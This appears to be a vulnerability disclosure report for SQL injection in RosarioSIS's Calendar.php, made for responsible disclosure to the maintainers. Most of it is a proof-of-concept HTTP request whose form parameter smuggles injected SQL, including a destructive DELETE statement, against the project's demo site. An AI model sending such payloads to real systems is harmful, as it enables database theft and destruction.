SQL injection in Calendar.php in francoisjacquet/rosariosis
Valid
Reported on
Apr 25th 2022
Description
In Calendar.php line 498-513, web server get values parameter as a part of sql query without sanitize, so attacker can be manipulated sql query, which is executed by web server https://github.com/francoisjacquet/rosariosis/blob/51947b6cfc7f0df62ab3305839c89586004fbec2/modules/School_Setup/Calendar.php#L498
Proof of Concept
POST /demonstration/Modules.php?modname=School_Setup/Calendar.php&modfunc=detail&event_id=new&month=04&year=2022 HTTP/1.1
Host: www.rosariosis.org
Cookie: RosarioSIS=ls2p6bohdqumdr8oecokk4j3bp8e79vs3mrhkgn37905r7i2phi0
Content-Length: 205
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Sec-Ch-Ua-Platform: "Linux"
Origin: https://www.rosariosis.org
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.rosariosis.org/demonstration/Modules.php?modname=School_Setup/Calendar.php&modfunc=detail&year=2022&month=04&school_date=2022-04-04&event_id=new
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,vi;q=0.8,no;q=0.7
Connection: close
month_values[SCHOOL_DATE]=04&day_values[SCHOOL_DATE]=04&year_values[SCHOOL_DATE]=202'2&REPEAT=1&values[DESCRIPTION) values (23,"2021","1",NULL);DELETE *FROM ;--][TITLE]=123&values[DESCRIPTION]=&button=Save
Impact
An attacker can modify the query and get all the data in the database.
We are processing your report and will contact the
francoisjacquet/rosariosis
team within 24 hours.
a year ago
We have contacted a member of the
francoisjacquet/rosariosis
team and are waiting to hear back
a year ago
The researcher's credibility has increased: +7
to join this conversation